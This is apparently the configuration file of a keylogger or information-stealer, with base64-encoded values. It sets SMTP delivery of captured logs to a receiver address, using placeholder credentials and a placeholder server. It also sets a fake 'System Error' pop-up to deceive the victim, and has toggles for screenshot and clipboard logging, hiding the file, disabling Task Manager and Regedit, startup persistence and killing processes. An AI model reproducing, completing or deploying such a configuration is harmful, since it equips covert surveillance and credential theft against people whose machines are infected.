setup=U01UUA==
mail=WW91ci1lbWFpbEBtYWlsLmNvbQ==
pass=UGFzc3dvcmQ=
reciever=UmVjaWV2ZXJAbWFpbC5jb20=
SMTP=c210cC54eC5jb20=
port=587
SSL=dHJ1ZQ==
hostname=
Username=
Password=
INTERVAL=300000
IPLOG=false
SCREENLOG=false
LIP=false
CLIPLOG=false
HIDEFILE=false
CMD=false
REGEDIT=false
MSCONFIG=false
TASKMGR=false
STARTUP=false
KEYNAME=none
PATH=none
PROCKILL=false
PROCNAMES=
MSG=VGhlIGFwcGxpY2F0aW9uIHdhcyB1bmFibGUgdG8gc3RhcnQgY29ycmVjdGx5ICgweGMwMDAwMTQyKS4gQ2xpY2sgT0sgdG8gY2xvc2UgdGhlIGFwcGxpY2F0aW9uLg==
TITLE=U3lzdGVtIEVycm9y
ICON=V2FybmluZw==
WEBVIS=NULL
MUTEX=key
ALGO=QUVT
KEY=
